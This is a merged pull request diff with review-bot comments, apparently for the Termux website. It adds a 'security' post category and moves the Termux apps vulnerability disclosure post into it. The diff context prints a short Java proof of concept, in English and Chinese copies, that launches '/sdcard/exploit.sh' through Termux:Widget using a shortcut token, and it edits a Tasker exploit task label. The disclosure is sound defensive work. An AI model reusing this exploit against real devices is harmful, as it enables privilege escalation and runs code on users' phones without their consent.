Merged
7 changes: 7 additions & 0 deletions _config.yml
Original file line number Diff line number Diff line change
Expand Up @@ -48,6 +48,7 @@ collections:
feed:
categories:
- general
- security

show_excerpts: true # set to true to show excerpts on posts

Expand Down Expand Up @@ -102,6 +103,12 @@ defaults:
values:
category: packages

-
scope:
path: "_posts/*/security"
values:
category: security


# Set page.lang for all posts files under respective languages and permalink with /en/:collection prefix
-
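Review bot: The new `defaults` entry takes the category from the directory glob `_posts/*/security`, so moving a post between categories now means renaming its directory and also updating `page_ref`, `redirect_from` and the sitemap excludes by hand, as the disclosure post in this PR does. A short comment on this entry listing those steps would keep the next move from leaving a stale path behind. The entry is also followed by two blank lines where the neighbouring entries are separated by one.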
Expand Down
2 changes: 2 additions & 0 deletions _data/posts/t/cn/views.yml
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,9 @@ index:
apps: 应用
general: 常规
packages: 包
security: 安全
apps_posts: 关于应用的文章
general_posts: 常规文章
packages_posts: 关于软件包的文章
security_posts: 安全类文章
subscribe_to_rss_feed: 订阅RSS源
2 changes: 2 additions & 0 deletions _data/posts/t/en/views.yml
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,9 @@ index:
apps: Apps
general: General
packages: Packages
security: Security
apps_posts: Apps Posts
general_posts: General Posts
packages_posts: Packages Posts
security_posts: Security Posts
subscribe_to_rss_feed: Subscribe to RSS feed
2 changes: 2 additions & 0 deletions _data/sitemap.yml
Original file line number Diff line number Diff line change
Expand Up @@ -2,4 +2,6 @@ excludes:
- /redirects.json
- /feed.xml
- /general/2022/02/15/termux-apps-vulnerability-disclosures.html
- /en/posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
- /cn/posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
- /apps/2022/02/25/termux-tasker-v0.6.0-release.html
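Review bot: The two added `excludes` entries repeat by hand the old `/en/posts/general/...` and `/cn/posts/general/...` paths that the disclosure post now lists under `redirect_from`, and nothing ties the two lists together. Add a comment above `excludes:` saying that every `redirect_from` path needs a matching entry here, so a later move does not leave a redirect stub in the sitemap.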
1 change: 1 addition & 0 deletions _data/t/cn/views/navigation.yml
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,7 @@ docs: 文档
posts: 文章
packages: 软件包
donate: 捐赠
security: 安全
privacy_policy: 隐私政策

# Footer
Expand Down
10 changes: 5 additions & 5 deletions _includes/header.html
Original file line number Diff line number Diff line change
Expand Up @@ -23,15 +23,15 @@
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/docs/index.html">{%- include t.html key="views.navigation.docs" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/docs/index.html">{%- include t.html key="views.navigation.docs" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/docs/index.html">{%- include t.html key="views.navigation.docs" -%}</a>
{%- endif -%}

{%- assign path = page.lang | append: "/posts/index.md" -%}
{%- assign file_exists = site.html_pages | where: "path", path -%}
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/posts/index.html">{%- include t.html key="views.navigation.posts" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/posts/index.html">{%- include t.html key="views.navigation.posts" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/posts/index.html">{%- include t.html key="views.navigation.posts" -%}</a>
{%- endif -%}

<a class="page-link" href="https://packages.termux.dev">{%- include t.html key="views.navigation.packages" -%}</a>
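Review bot: In each `else` branch the link still points at `/{{- site.lang -}}/...` while the `t.html` include appears both with and without `lang=site.lang`; with the argument dropped, the label language depends on whatever default `t.html` applies, and the target page stays in `site.lang`. If showing the label in the page's language over a fallback-language target is intended, say so in a Liquid comment next to the first `else`, since the same edit is repeated for docs, posts, donate, security and privacy policy and the reason is not visible in the template.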
Expand All @@ -41,23 +41,23 @@
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/donate">{%- include t.html key="views.navigation.donate" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/donate">{%- include t.html key="views.navigation.donate" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/donate">{%- include t.html key="views.navigation.donate" -%}</a>
{%- endif -%}

{%- assign path = page.lang | append: "/security.md" -%}
{%- assign file_exists = site.html_pages | where: "path", path -%}
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/security">{%- include t.html key="views.navigation.security" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/security">{%- include t.html key="views.navigation.security" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/security">{%- include t.html key="views.navigation.security" -%}</a>
{%- endif -%}

{%- assign path = page.lang | append: "/privacy-policy.md" -%}
{%- assign file_exists = site.html_pages | where: "path", path -%}
{%- if file_exists.size != 0 -%}
<a class="page-link" href="/{{- page.lang -}}/privacy-policy">{%- include t.html key="views.navigation.privacy_policy" -%}</a>
{%- else -%}
<a class="page-link" href="/{{- site.lang -}}/privacy-policy">{%- include t.html key="views.navigation.privacy_policy" lang=site.lang -%}</a>
<a class="page-link" href="/{{- site.lang -}}/privacy-policy">{%- include t.html key="views.navigation.privacy_policy" -%}</a>
{%- endif -%}

{%- if page.page_ref and page.lang -%}
Expand Down
2 changes: 1 addition & 1 deletion _includes/posts/category.html
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@

{%- assign category_posts = site.categories[page.category_name] | where: "lang", page.lang -%}
{%- assign category_translate_key = "views.index." | append: page.category_name | append: "_posts" -%}
<h1 class="page-heading">{%- include t.html root="posts" key=category_translate_key -%} ({{- category_posts.size | default: "0" -}})</h1>
<h1 class="page-heading">{%- include t.html root="posts" key=category_translate_key %} ({{- category_posts.size | default: "0" -}})</h1>

{%- if category_posts.size > 0 -%}
<ul class="post-list">
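Review bot: On the `<h1 class="page-heading">` line the only difference is `-%}` becoming `%}` after the `t.html` include, which keeps the space before the `(count)`. That dependency on Liquid whitespace control is easy to undo in a later cleanup; a brief `{%- comment -%}` above the line, or an explicit space entity before the parenthesis, would make the intent survive.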
Expand Down
1 change: 1 addition & 0 deletions _layouts/posts/index.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,7 @@ layout: page
- [{%- include t.html root="posts" key="views.index.general" -%}](/{{- page.lang -}}/posts/general.html)
- [{%- include t.html root="posts" key="views.index.apps" -%}](/{{- page.lang -}}/posts/apps.html)
- [{%- include t.html root="posts" key="views.index.packages" -%}](/{{- page.lang -}}/posts/packages.html)
- [{%- include t.html root="posts" key="views.index.security" -%}](/{{- page.lang -}}/posts/security.html)

[{%- include t.html root="posts" key="views.index.subscribe_to_rss_feed" -%}](/feed.xml).

Expand Down
2 changes: 1 addition & 1 deletion _posts/cn/apps/2022-02-25-termux-tasker-v0.6.0-release.md
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ page_ref: /posts/apps/2022/02/25/termux-tasker-v0.6.0-release.html

`Termux:Tasker` `v0.6.0` 版本已经发布。

**强烈建议您更新到 `v0.5.0` 或更高版本以修复 [Termux 应用程序漏洞披露](https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html) 。**
**强烈建议您更新到 `v0.5.0` 或更高版本以修复 [Termux 应用程序漏洞披露](https://termux.github.io/cn/posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html) 。**
##


Expand Down
Original file line number Diff line number Diff line change
@@ -1,6 +1,8 @@
---
title: "Termux应用程序漏洞披露"
page_ref: /posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
redirect_from:
- /cn/posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
page_ref: /posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html
---

这是 `termux-app`、`termux-tasker` 和 `termux-widget` 的漏洞报告。
Expand Down Expand Up @@ -86,11 +88,11 @@ context.sendBroadcast(intent);
或者从任何一个应用程序,执行以下 Java 代码:

```java
Intent intent = new Intent();
intent.setClassName("com.termux.widget", "com.termux.widget.TermuxLaunchShortcutActivity");
intent.setData(Uri.parse("/sdcard/exploit.sh"));
intent.putExtra("com.termux.shortcut.token", "22e30b81-5d67-4ee3-be0e-66169f637025");
startActivity(intent);
Intent intent = new Intent();
intent.setClassName("com.termux.widget", "com.termux.widget.TermuxLaunchShortcutActivity");
intent.setData(Uri.parse("/sdcard/exploit.sh"));
intent.putExtra("com.termux.shortcut.token", "22e30b81-5d67-4ee3-be0e-66169f637025");
startActivity(intent);
```

Termux 应用程序将会执行使用 `/data/data/com.termux/files/usr/bin/sh` 执行 `/sdcard/exploit.sh` 脚本,`/sdcard` 被挂载为 `noexec` 也没有问题。
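Review bot: The five Java lines inside the fenced block are textually identical on both sides of this hunk, so the change is whitespace only and unrelated to the category move. Consider splitting it into its own commit, or mention the re-indentation in the PR description, so the security-post history shows only the path changes.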
Expand Down
2 changes: 1 addition & 1 deletion _posts/en/apps/2022-02-25-termux-tasker-v0.6.0-release.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@ page_ref: /posts/apps/2022/02/25/termux-tasker-v0.6.0-release.html

The `Termux:Tasker` `v0.6.0` is out.

**It is highly recommended that you update to `v0.5.0` or higher for fixes for vulnerabilities disclosed in the [Termux Apps Vulnerability Disclosures](https://termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html) post.**
**It is highly recommended that you update to `v0.5.0` or higher for fixes for vulnerabilities disclosed in the [Termux Apps Vulnerability Disclosures](https://termux.github.io/en/posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html) post.**
##


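Review bot: The updated link in the bold notice is still an absolute `https://termux.github.io/...` URL, while the header template in this PR builds site links as relative `/{{- page.lang -}}/...` paths. A site-relative link to `/en/posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html` would not need touching again if the host changes; the same applies to the `cn` copy of this post.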
Expand Down
Original file line number Diff line number Diff line change
@@ -1,7 +1,9 @@
---
title: "Termux Apps Vulnerability Disclosures"
redirect_from: /general/2022/02/15/termux-apps-vulnerability-disclosures.html
page_ref: /posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
redirect_from:
- /general/2022/02/15/termux-apps-vulnerability-disclosures.html
- /en/posts/general/2022/02/15/termux-apps-vulnerability-disclosures.html
page_ref: /posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html
---

This is a vulnerability report for `termux-app`, `termux-tasker` and `termux-widget`.
Expand Down Expand Up @@ -88,11 +90,11 @@ The `Termux:Widget` "security" worked by [generating a token](https://github.com
Or use java from any app.

```java
Intent intent = new Intent();
intent.setClassName("com.termux.widget", "com.termux.widget.TermuxLaunchShortcutActivity");
intent.setData(Uri.parse("/sdcard/exploit.sh"));
intent.putExtra("com.termux.shortcut.token", "22e30b81-5d67-4ee3-be0e-66169f637025");
startActivity(intent);
Intent intent = new Intent();
intent.setClassName("com.termux.widget", "com.termux.widget.TermuxLaunchShortcutActivity");
intent.setData(Uri.parse("/sdcard/exploit.sh"));
intent.putExtra("com.termux.shortcut.token", "22e30b81-5d67-4ee3-be0e-66169f637025");
startActivity(intent);
```

The termux app will run the `/sdcard/exploit.sh` script with `/data/data/com.termux/files/usr/bin/sh` and `/sdcard` being mounted as `noexec` would not be an issue.
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@
<pri>100</pri>
<Action sr="act0" ve="7">
<code>300</code>
<label>Termux:Tasker exploit task as detailed in https:termux.github.io/general/2022/02/15/termux-apps-vulnerability-disclosures.html#1-termux-tasker-privilege-escalation-vulnerability.
<label>Termux:Tasker exploit task as detailed in https://termux.github.io/en/posts/security/2022/02/15/termux-apps-vulnerability-disclosures.html#termuxtasker-privilege-escalation-vulnerability.

Sample java code:
```
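Review bot: The `<label>` URL changes its fragment as well as its path, from `#1-termux-tasker-privilege-escalation-vulnerability` to `#termuxtasker-privilege-escalation-vulnerability`. Please confirm the new fragment matches the heading id the post actually renders. Copies of this task file that users already imported keep the old URL, so they depend on the `redirect_from` entries staying in place.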
Expand Down
10 changes: 10 additions & 0 deletions cn/posts/security.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,10 @@
---
layout: page
title: 安全类文章
no_add_title_heading: true
category_name: security
page_ref: /posts/security.html
lang: cn
---

{% include posts/category.html %}
9 changes: 9 additions & 0 deletions en/posts/security.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
---
layout: page
title: Security Posts
no_add_title_heading: true
category_name: security
page_ref: /posts/security.html
---

{% include posts/category.html %}
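Review bot: This front matter has no `lang` key, while `cn/posts/security.html` sets `lang: cn` and `_includes/posts/category.html` selects posts with `where: "lang", page.lang`. If no `defaults` entry supplies `lang` for `en/posts/`, the English security list will render empty; either add `lang: en` here or note which default covers it.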